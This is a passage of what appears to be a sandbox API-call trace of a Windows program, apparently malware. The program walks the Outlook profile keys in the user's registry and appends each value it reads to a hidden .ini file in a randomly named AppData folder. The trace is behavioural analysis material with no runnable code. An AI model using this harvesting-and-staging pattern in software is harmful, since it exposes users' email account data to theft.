Information=0x1)) returned 0x0 [0243.575] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.575] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.575] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x52, ByteOffset=0x19d600*=1402, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.575] NtClose (Handle=0x110) returned 0x0 [0243.576] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x1, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.576] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.576] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.576] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.576] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x12, ByteOffset=0x19d600*=1484, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.576] NtClose (Handle=0x110) returned 0x0 [0243.589] RtlIntegerToChar (in: Value=0x43f3cd07, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="1140051207") returned 0x0 [0243.590] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.590] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.590] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.590] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.590] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=1502, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.590] NtClose (Handle=0x110) returned 0x0 [0243.591] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x2, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.591] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.591] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.591] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.591] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.591] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=1526, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.592] NtClose (Handle=0x110) returned 0x0 [0243.592] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.592] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.593] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.593] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.593] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x14, ByteOffset=0x19d600*=1550, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.593] NtClose (Handle=0x110) returned 0x0 [0243.593] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x3, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.594] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.594] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.594] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.594] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1a, ByteOffset=0x19d600*=1570, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.594] NtClose (Handle=0x110) returned 0x0 [0243.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.595] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.595] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.595] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.595] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x18, ByteOffset=0x19d600*=1596, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.595] NtClose (Handle=0x110) returned 0x0 [0243.596] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x4, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.596] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.596] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.596] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.596] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1c, ByteOffset=0x19d600*=1620, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.596] NtClose (Handle=0x110) returned 0x0 [0243.605] RtlIntegerToChar (in: Value=0x4, Base=0x0, Length=0x20, String=0x19d6e8 | out: String="4") returned 0x0 [0243.605] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.606] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.606] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.606] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.606] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x6, ByteOffset=0x19d600*=1648, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.606] NtClose (Handle=0x110) returned 0x0 [0243.607] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x5, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.607] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.607] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.607] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.607] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.607] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x1a, ByteOffset=0x19d600*=1654, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.608] NtClose (Handle=0x110) returned 0x0 [0243.608] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.608] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.609] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.609] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.609] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x22, ByteOffset=0x19d600*=1680, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.609] NtClose (Handle=0x110) returned 0x0 [0243.610] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x6, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x0 [0243.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.610] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.610] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.610] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.610] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x20, ByteOffset=0x19d600*=1714, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.610] NtClose (Handle=0x110) returned 0x0 [0243.611] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d688, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.611] NtCreateFile (in: FileHandle=0x19d6a8, DesiredAccess=0x12019f, ObjectAttributes=0x19d670*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d690, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d6a8*=0x110, IoStatusBlock=0x19d690*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.611] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.611] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d690, FileInformation=0x19d5e8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d690, FileInformation=0x19d5e8) returned 0x0 [0243.611] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d690, Buffer=0x422670*, Length=0x14, ByteOffset=0x19d600*=1746, Key=0x0 | out: IoStatusBlock=0x19d690, Buffer=0x422670*) returned 0x0 [0243.611] NtClose (Handle=0x110) returned 0x0 [0243.612] NtEnumerateValueKey (in: KeyHandle=0x104, Index=0x7, KeyValueInformationClass=0x1, KeyValueInformation=0x19d780, Length=0x400, ResultLength=0x19e3dc | out: KeyValueInformation=0x19d780, ResultLength=0x19e3dc) returned 0x8000001a [0243.612] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x19d720, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.612] NtCreateFile (in: FileHandle=0x19d740, DesiredAccess=0x12019f, ObjectAttributes=0x19d708*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19d728, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19d740*=0x110, IoStatusBlock=0x19d728*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0243.612] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x42b008) returned 1 [0243.612] NtQueryInformationFile (in: FileHandle=0x110, IoStatusBlock=0x19d728, FileInformation=0x19d680, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x19d728, FileInformation=0x19d680) returned 0x0 [0243.612] NtWriteFile (in: FileHandle=0x110, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19d728, Buffer=0x422670*, Length=0x4, ByteOffset=0x19d698*=1766, Key=0x0 | out: IoStatusBlock=0x19d728, Buffer=0x422670*) returned 0x0 [0243.612] NtClose (Handle=0x110) returned 0x0 [0243.613] NtClose (Handle=0x104) returned 0x0 [0243.613] NtEnumerateKey (in: KeyHandle=0x108, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0243.613] NtClose (Handle=0x108) returned 0x0 [0243.613] NtEnumerateKey (in: KeyHandle=0x100, Index=0x9, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0243.613] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\94ba7772fb349a48ba2cc741623a1549", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0243.613] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0243.613] NtClose (Handle=0x108) returned 0x0 [0243.613] NtEnumerateKey (in: KeyHandle=0x100, Index=0xa, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0243.614] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\a44d88fba08a5547a1aaad50659b22d8", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0243.614] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0243.614] NtClose (Handle=0x108) returned 0x0 [0243.614] NtEnumerateKey (in: KeyHandle=0x100, Index=0xb, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 | out: KeyInformation=0x19df80, ResultLength=0x19e3c8) returned 0x0 [0243.614] NtCreateKey (in: KeyHandle=0x19e3d4, DesiredAccess=0x20219, ObjectAttributes=0x19d738*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\ae0727370bd4364ea1d3e75390877e70", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19e3d4*=0x108) returned 0x0 [0243.614] NtEnumerateKey (in: KeyHandle=0x108, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19db80, Length=0x400, ResultLength=0x19e3dc | out: KeyInformation=0x19db80, ResultLength=0x19e3dc) returned 0x8000001a [0243.614] NtClose (Handle=0x108) returned 0x0 [0243.614] NtEnumerateKey (in: KeyHandle=0x100, Index=0xc, KeyInformationClass=0x0, KeyInformation=0x19df80, Length=0x200, ResultLength=0x19e3c8 